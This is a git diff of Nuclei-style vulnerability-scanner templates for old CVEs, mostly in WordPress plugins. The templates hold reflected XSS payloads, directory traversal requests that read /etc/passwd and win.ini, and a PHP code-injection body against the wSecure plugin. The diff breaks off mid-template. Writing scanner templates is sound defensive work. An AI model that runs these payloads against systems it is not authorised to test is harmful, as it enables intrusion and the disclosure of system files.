diff --git a/CVE-2009-1558.yaml b/CVE-2009-1558.yaml new file mode 100755 index 0000000..f56848b --- /dev/null +++ b/CVE-2009-1558.yaml @@ -0,0 +1,24 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml index e043051..301cd48 100644 --- a/CVE-2011-4618.yaml +++ b/CVE-2011-4618.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml index 6b6eae3..2ae32f0 100644 --- a/CVE-2011-4624.yaml +++ b/CVE-2011-4624.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml index 17178b7..bbefdb8 100644 --- a/CVE-2011-4926.yaml +++ b/CVE-2011-4926.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-5106.yaml b/CVE-2011-5106.yaml index a17da7f..fb203bd 100644 --- a/CVE-2011-5106.yaml +++ b/CVE-2011-5106.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml index c01e565..ef7a3e9 100644 --- a/CVE-2011-5107.yaml +++ b/CVE-2011-5107.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml index 9c92b5c..fc3dcab 100644 --- a/CVE-2011-5179.yaml +++ b/CVE-2011-5179.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml index 41812c7..c7e74be 100644 --- a/CVE-2011-5181.yaml +++ b/CVE-2011-5181.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml index 2ed7592..5412865 100644 --- a/CVE-2011-5265.yaml +++ b/CVE-2011-5265.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml index fb82bdf..728c0cc 100644 --- a/CVE-2012-0901.yaml +++ b/CVE-2012-0901.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2012-1835.yaml b/CVE-2012-1835.yaml new file mode 100755 index 0000000..9bc5c08 --- /dev/null +++ b/CVE-2012-1835.yaml @@ -0,0 +1,34 @@ +id: CVE-2012-1835 + +info: + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml index 61a2207..b41122f 100644 --- a/CVE-2012-2371.yaml +++ b/CVE-2012-2371.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E' + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2012-4242.yaml b/CVE-2012-4242.yaml index 791034e..d7ca7ac 100644 --- a/CVE-2012-4242.yaml +++ b/CVE-2012-4242.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2012-4273.yaml b/CVE-2012-4273.yaml index db31bfa..99a6f52 100644 --- a/CVE-2012-4273.yaml +++ b/CVE-2012-4273.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2012-4768.yaml b/CVE-2012-4768.yaml index e89963b..5c19877 100644 --- a/CVE-2012-4768.yaml +++ b/CVE-2012-4768.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml index be685d2..cdbbce2 100644 --- a/CVE-2012-5913.yaml +++ b/CVE-2012-5913.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E' + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2013-2287.yaml b/CVE-2013-2287.yaml index 33a0b55..05ae701 100644 --- a/CVE-2013-2287.yaml +++ b/CVE-2013-2287.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2013-4117.yaml b/CVE-2013-4117.yaml index f30a61b..2b2a102 100644 --- a/CVE-2013-4117.yaml +++ b/CVE-2013-4117.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2013-4625.yaml b/CVE-2013-4625.yaml index 4b9f913..e2184bc 100644 --- a/CVE-2013-4625.yaml +++ b/CVE-2013-4625.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2014-4513.yaml b/CVE-2014-4513.yaml index dfcae28..2661d56 100644 --- a/CVE-2014-4513.yaml +++ b/CVE-2014-4513.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' + - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2016-1000128.yaml b/CVE-2016-1000128.yaml new file mode 100755 index 0000000..b3dea4b --- /dev/null +++ b/CVE-2016-1000128.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000128 + +info: + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000129.yaml b/CVE-2016-1000129.yaml new file mode 100755 index 0000000..9b0f144 --- /dev/null +++ b/CVE-2016-1000129.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000129 + +info: + name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000130.yaml b/CVE-2016-1000130.yaml new file mode 100755 index 0000000..1814107 --- /dev/null +++ b/CVE-2016-1000130.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000130 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000131.yaml b/CVE-2016-1000131.yaml new file mode 100755 index 0000000..a9c8dcb --- /dev/null +++ b/CVE-2016-1000131.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000132.yaml b/CVE-2016-1000132.yaml new file mode 100755 index 0000000..fa94048 --- /dev/null +++ b/CVE-2016-1000132.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000132 + +info: + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000133.yaml b/CVE-2016-1000133.yaml new file mode 100755 index 0000000..48e7531 --- /dev/null +++ b/CVE-2016-1000133.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000134.yaml b/CVE-2016-1000134.yaml new file mode 100755 index 0000000..99d4268 --- /dev/null +++ b/CVE-2016-1000134.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000135.yaml b/CVE-2016-1000135.yaml new file mode 100755 index 0000000..48480b2 --- /dev/null +++ b/CVE-2016-1000135.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-10956.yaml b/CVE-2016-10956.yaml index 4c48c18..b59c24d 100644 --- a/CVE-2016-10956.yaml +++ b/CVE-2016-10956.yaml @@ -2,7 +2,7 @@ id: CVE-2016-10956 info: name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) - author: daffainfo + author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml new file mode 100755 index 0000000..68f7e26 --- /dev/null +++ b/CVE-2016-10960.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: critical + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: | + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Nuclei: CVE-2016-10960" + condition: and + part: header + - type: status + status: + - 200 diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml index 3d321b4..8dab040 100644 --- a/CVE-2017-17043.yaml +++ b/CVE-2017-17043.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml index ecf71fa..9bc3b47 100644 --- a/CVE-2017-17059.yaml +++ b/CVE-2017-17059.yaml @@ -13,7 +13,7 @@ info: requests: - method: POST path: - - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1" body: "amty_hidden=1" @@ -21,7 +21,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml index 40a4e59..9a2c3bc 100644 --- a/CVE-2017-17451.yaml +++ b/CVE-2017-17451.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml index 5ac65f8..7bed4c1 100644 --- a/CVE-2017-18536.yaml +++ b/CVE-2017-18536.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml index 19bdc03..da92a85 100644 --- a/CVE-2017-9288.yaml +++ b/CVE-2017-9288.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml index 4f305a6..b71a582 100644 --- a/CVE-2018-11709.yaml +++ b/CVE-2018-11709.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2018-12031.yaml b/CVE-2018-12031.yaml new file mode 100755 index 0000000..0fc4b18 --- /dev/null +++ b/CVE-2018-12031.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-12031 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: high + description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + reference: | + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + - "\\[(font|extension|file)s\\]" + condition: or + part: body + - type: status + status: + - 200 diff --git a/CVE-2018-16059.yaml b/CVE-2018-16059.yaml new file mode 100755 index 0000000..d907c47 --- /dev/null +++ b/CVE-2018-16059.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-16059 + +info: + name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal + author: daffainfo + severity: medium + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 + - https://www.exploit-db.com/exploits/45342 + tags: cve,cve2018,iot,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml index 79a0cbd..a7af377 100644 --- a/CVE-2018-20462.yaml +++ b/CVE-2018-20462.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml index 7553a25..13f88cb 100644 --- a/CVE-2018-5316.yaml +++ b/CVE-2018-5316.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml index 55c9e48..311cc6e 100644 --- a/CVE-2019-15713.yaml +++ b/CVE-2019-15713.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + - 